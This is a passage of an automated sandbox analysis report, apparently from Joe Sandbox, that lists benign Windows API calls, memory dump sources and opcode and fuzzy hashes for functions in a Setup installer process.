  • Part of subcall function 69DB374B: PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,69DAFA6E,0000000C,69DB3A05,?,69D6A794,?), ref: 69DB37B7
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DefaultExistsFileLanguagePathUser_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2326855983-0
                                                                                                                                                                    • Opcode ID: 78fe8a606ad9b39b8d87891c5df55f589dcd08039852c3f52b4c0f17ed9c15b0
                                                                                                                                                                    • Instruction ID: 9f9fa4ae89bf0bb08c6965d59a6c446a577ce47a78bbcb2cfe6b7fe67f3154a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 78fe8a606ad9b39b8d87891c5df55f589dcd08039852c3f52b4c0f17ed9c15b0
                                                                                                                                                                    • Instruction Fuzzy Hash: 431127F8C0022ADBCF11DFE48941AAEBB78AF04744F009466D9627BA09D7389542DBF1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698EF365
• __recalloc.LIBCMT ref: 698EF3A7
  • Part of subcall function 698F83FD: __CxxThrowException@8.LIBCMT ref: 698F83E2
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Exception@8H_prolog3Throw__recalloc
• String ID:
• API String ID: 2968967773-0
• Opcode ID: ae8360946b94439a94e370d5c9469f62969284ee538b32eaf1895f0769d7e139
• Instruction ID: 8adb4d1806f7ee3d33303d315630d4b8aba7073a96c9224fb235b2e8fb87a745
• Opcode Fuzzy Hash: ae8360946b94439a94e370d5c9469f62969284ee538b32eaf1895f0769d7e139
• Instruction Fuzzy Hash: D401963560074187D711CF29D5A171AB3E6FFB2748F608D1CD5A59B544EB72E803DB40
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA906E
• __recalloc.LIBCMT ref: 69DA90B0
  • Part of subcall function 69DC8E8C: __CxxThrowException@8.LIBCMT ref: 69DC8EA0
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Exception@8H_prolog3Throw__recalloc
• String ID:
• API String ID: 2968967773-0
• Opcode ID: 9418b3ccf933ecd90ee0a96d6f0092a73aa60e372d68b68971f532729ca93823
• Instruction ID: e02cb8eb65c40b8ef83f106b12acf2750911c97bb74da5e8b0a1e6d530ba1ff7
• Opcode Fuzzy Hash: 9418b3ccf933ecd90ee0a96d6f0092a73aa60e372d68b68971f532729ca93823
• Instruction Fuzzy Hash: 3A01AD31640601CAD720CF38C68071A73EAEF817C8B61883CC5A59BE40EB73E822C799
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: _memmove_s
• String ID:
• API String ID: 800865076-0
• Opcode ID: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
• Instruction ID: b1e0e07221fdae52e6518edc31973a95dc851b53d9d7ca7f7a6a46535d7e25f5
• Opcode Fuzzy Hash: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
• Instruction Fuzzy Hash: A601BCB5600004EF8B08CF58CDA9D6EB3AEEF94348710413DE5458B640EF71AD00C6A6
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB3AD3
• _memcpy_s.LIBCMT ref: 69DB3B17
  • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
  • Part of subcall function 69DAFF21: _wcsnlen.LIBCMT ref: 69DAFF54
  • Part of subcall function 69DAFF21: _memcpy_s.LIBCMT ref: 69DAFF8A
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: _memcpy_s_wcsnlen$H_prolog3
• String ID:
• API String ID: 301610209-0
• Opcode ID: ce4fe6c0659fec62a16cfec2fd8f570cac391580253cf4a7cf4b85bdf95e7cce
• Instruction ID: 13b2adaee34dde30eeacf30d2b9965e50517fa6bcb8e4b99e483a87e903cb579
• Opcode Fuzzy Hash: ce4fe6c0659fec62a16cfec2fd8f570cac391580253cf4a7cf4b85bdf95e7cce
• Instruction Fuzzy Hash: C601287A50020AEFCB00DF68D881E9E736AFF04304B44D975F9119B651DB34EA29CBB2
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetLastError.KERNEL32(0000000E,00000000), ref: 698EDFD6
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 992152975c6b579828c46cb307323bab8412d3fedff707f412070478371e49ff
• Instruction ID: 3295846ed13a3ef7ec5a0086725e2c177db38ced88f2ede9dbb65bd90b6e5070
• Opcode Fuzzy Hash: 992152975c6b579828c46cb307323bab8412d3fedff707f412070478371e49ff
• Instruction Fuzzy Hash: 7DF0BE323482046FE610A669DC4AF567798AB8BBA4F408D2AFA04EB181CA61AC048390
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNEL32(00000000,00000034,00000000,00000001,00000000,00000000,00000034,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC84A9
• RegCloseKey.ADVAPI32(?,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC84BA
  • Part of subcall function 69DC8414: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,69DC849F,00000000,00000034,00000001,00000000,00000000,00000034,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC8425
  • Part of subcall function 69DC8414: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 69DC8435
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: AddressCloseHandleModuleOpenProc
• String ID:
• API String ID: 823179699-0
• Opcode ID: 251d1a86fbf0b6dc7908f4eaf191f09fe6875f9cdd27809b2c16f945557bdf0f
• Instruction ID: 6ffe59da20d491066483be64968e7c4bdd36298db325b37bc7516117aab2ea2e
• Opcode Fuzzy Hash: 251d1a86fbf0b6dc7908f4eaf191f09fe6875f9cdd27809b2c16f945557bdf0f
• Instruction Fuzzy Hash: F9F0497610920AFBEB058F44CD41F9ABB6EFF00366F208029E915AB540D731DA208BA0
Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: __recalloc
• String ID:
• API String ID: 492097735-0
• Opcode ID: 3c675ecc4d7f7adcfd4d8a0b3a4f198d11c50a5156c324ca8cfe79ed0944204a
• Instruction ID: dbf428c2f7e404aadca3e2154a3d7615590c120d3f74b790dfe05729d4f90948
• Opcode Fuzzy Hash: 3c675ecc4d7f7adcfd4d8a0b3a4f198d11c50a5156c324ca8cfe79ed0944204a
• Instruction Fuzzy Hash: 73F03AB5640204AFEF008F64CC81A62BBA8EB19254B04D070EE19CE68AE635C822C7A1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: _memcpy_s
• String ID:
• API String ID: 2001391462-0
• Opcode ID: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
• Instruction ID: 54d065e510e43a816a5b1ee9c83fcc361ade66041b82e214615cbf5f14b7439a
• Opcode Fuzzy Hash: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
• Instruction Fuzzy Hash: 0CF03A76800158BB8F10CF96CC44DCF7F6DEE85254B148066FD04A7200E670EA41CBB1
Uniqueness
Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 698E11D8
• FlushFileBuffers.KERNEL32(?), ref: 698E11EA
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: File$BuffersFlushWrite
• String ID:
• API String ID: 1012034594-0
• Opcode ID: ce6644fb6fca041a435bcd57b03d903cb014eefed3e65614f2a5ced19651351a
• Instruction ID: 4e3232573000cce78f9bea156822c4ec90ae8e81b9e4d270e14a89e47f5dc5bb
• Opcode Fuzzy Hash: ce6644fb6fca041a435bcd57b03d903cb014eefed3e65614f2a5ced19651351a
• Instruction Fuzzy Hash: 1EE09236118246ABEB01AFA5DD05F9B3BE9EF16750B049829F914C1110E730E8208B90
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F6048
• GetCommandLineW.KERNEL32(0000001C,698E30C2,?), ref: 698F604D
  • Part of subcall function 698DBE03: __EH_prolog3.LIBCMT ref: 698DBE0A
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$CommandLine
• String ID:
• API String ID: 1384747822-0
• Opcode ID: 84fb455d94f8ea1dce7a08f413e353b32c4de5cfa105278348a2d7713f4512ae
• Instruction ID: 611d18517cb1531f490143431c7e3ec1ba7eef29b756b743d1eaed18ef419b79
• Opcode Fuzzy Hash: 84fb455d94f8ea1dce7a08f413e353b32c4de5cfa105278348a2d7713f4512ae
• Instruction Fuzzy Hash: E5F0123694011DCBDF04D7A8C854BEDB7746F6436CF44A61DE111B71C1DB74954ACBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 69DBD747
  • Part of subcall function 69DBFC46: __EH_prolog3.LIBCMT ref: 69DBFC4D
  • Part of subcall function 69DBFC46: GetLastError.KERNEL32(?,?,?,69DBCE79,00000000,69DBBCC4,?,80070057,?,InvalidArguments,?,00000000,?,ParameterInfo.xml,?,?), ref: 69DBFC73
• PostMessageW.USER32(?,00000012,00000000,00000000), ref: 69DBD768
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: CountErrorH_prolog3LastMessagePostTick
• String ID:
• API String ID: 1936365967-0
• Opcode ID: be66bc5af2a9729a9c505e21365d0d477e4b080fb9a74df11f15862dd27d0c5a
• Instruction ID: c44bd7928f3fbcb3e3467be81e66ceb13c631e28731e6913c6b6f9511337e08a
• Opcode Fuzzy Hash: be66bc5af2a9729a9c505e21365d0d477e4b080fb9a74df11f15862dd27d0c5a
• Instruction Fuzzy Hash: 33E092FB500646BFEB008FA488C4C66B72CFA44225310813AF51287D04C770DC519BA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F29F6
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698DD923: __EH_prolog3.LIBCMT ref: 698DD92A
  • Part of subcall function 698DD923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD960
  • Part of subcall function 698DD923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD9BA
  • Part of subcall function 698DD923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDA0D
• SysFreeString.OLEAUT32(00000000), ref: 698F2A33
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$Path$CombineFileFreeModuleNameRelativeString
• String ID:
• API String ID: 2530041087-0
• Opcode ID: b88a9d60098108e85b83691aa1344b1f747a612b8d2ffe55a0560a22810439e2
• Instruction ID: b1e932bca0b566bc45e81570390611310d5c61047bc24aeced72ea4075c62b87
• Opcode Fuzzy Hash: b88a9d60098108e85b83691aa1344b1f747a612b8d2ffe55a0560a22810439e2
• Instruction Fuzzy Hash: 56F0AC75910219FBDF01DFA4CC08ABE7BB8FF14359F40D82DF524A6150CB359A199B51
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • UnloadUserProfile.USERENV(69DA3AE6,69D6BF34,?,69DA4ABC,69D6A590,10000000,69D6A590,80000000,69D6A590,10000000,69D6A5D8,69D6A54C), ref: 69DA3AFB
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(69DA3AE6,?,69DA4ABC,69D6A590,10000000,69D6A590,80000000,69D6A590,10000000,69D6A5D8,69D6A54C), ref: 69DA3B0D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeCloseFindNotificationProfileUnloadUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 122385185-0
                                                                                                                                                                    • Opcode ID: f0c1f5247fe3065ddfe7bb3fa1ced755ca8c8dfca704fe1ba0bbe4e04c387174
                                                                                                                                                                    • Instruction ID: 52ef86caad8b1123a279282d57b9c9a69d4c55d9639534b0f7d98658b3418c52
                                                                                                                                                                    • Opcode Fuzzy Hash: f0c1f5247fe3065ddfe7bb3fa1ced755ca8c8dfca704fe1ba0bbe4e04c387174
                                                                                                                                                                    • Instruction Fuzzy Hash: 5FE0C231615B01DBEB288F16D949B23B7EEAF41622F11C82DA4AA87890DB75E850CB14
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D9517C
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D95194
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$FreeLoad
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 534179979-0
                                                                                                                                                                    • Opcode ID: f018ca782510d57e32fa4463189ac58239bf123bfd4a59012799b10b4ade5adf
                                                                                                                                                                    • Instruction ID: 4cc5cf6c8433bc458108dff44ec4d1d6181a6276c15b897ffa2ce281f80afe60
                                                                                                                                                                    • Opcode Fuzzy Hash: f018ca782510d57e32fa4463189ac58239bf123bfd4a59012799b10b4ade5adf
                                                                                                                                                                    • Instruction Fuzzy Hash: 56E0EC7A600744DBE7209F55D408A57BBE9EB85B11B00C839E96AD7910DB71F411CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SysStringByteLen.OLEAUT32(00000000), ref: 69DC8860
                                                                                                                                                                    • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 69DC8869
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteString$Alloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2785738885-0
                                                                                                                                                                    • Opcode ID: d05192668aa52651bff1c33c27dd66ea8f83766875b69c765c6804af6357cdbe
                                                                                                                                                                    • Instruction ID: 6bae7a9e11b2f104e21cb2493b1693c60623251a9cd999c38b784d30ee4bfaaa
                                                                                                                                                                    • Opcode Fuzzy Hash: d05192668aa52651bff1c33c27dd66ea8f83766875b69c765c6804af6357cdbe
                                                                                                                                                                    • Instruction Fuzzy Hash: B3D06775100241DBFB505FA5A808B1677ACBF05245B184A38B9A1E3954E735C490CB12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,69DB2CF3), ref: 69DA4035
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 69DA404C
                                                                                                                                                                      • Part of subcall function 69DC89C8: GetLastError.KERNEL32(69D780E8,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 69DC89C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: BuffersChangeCloseErrorFileFindFlushLastNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4236133906-0
                                                                                                                                                                    • Opcode ID: dc46fbfa905326a51b8aaf5db1e2294424e4deb87f1210c83a2e2e6ce02cb884
                                                                                                                                                                    • Instruction ID: 24ce441e5de7623b1d3153bb05b324be6571db31e700af3f68a0e05dd509ea91
                                                                                                                                                                    • Opcode Fuzzy Hash: dc46fbfa905326a51b8aaf5db1e2294424e4deb87f1210c83a2e2e6ce02cb884
                                                                                                                                                                    • Instruction Fuzzy Hash: 5ED01731514751CBEB709F34D60AB6676F8BF41356F018E28E562D7840DBB4E8148B69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 009A291C
                                                                                                                                                                    • Run.SETUPENGINE ref: 009A2922
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HeapInformation
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3918721486-0
                                                                                                                                                                    • Opcode ID: 9c0aad16a663e607946613f71ff52958745664ddaee1c5a51e90edd2dda81b9a
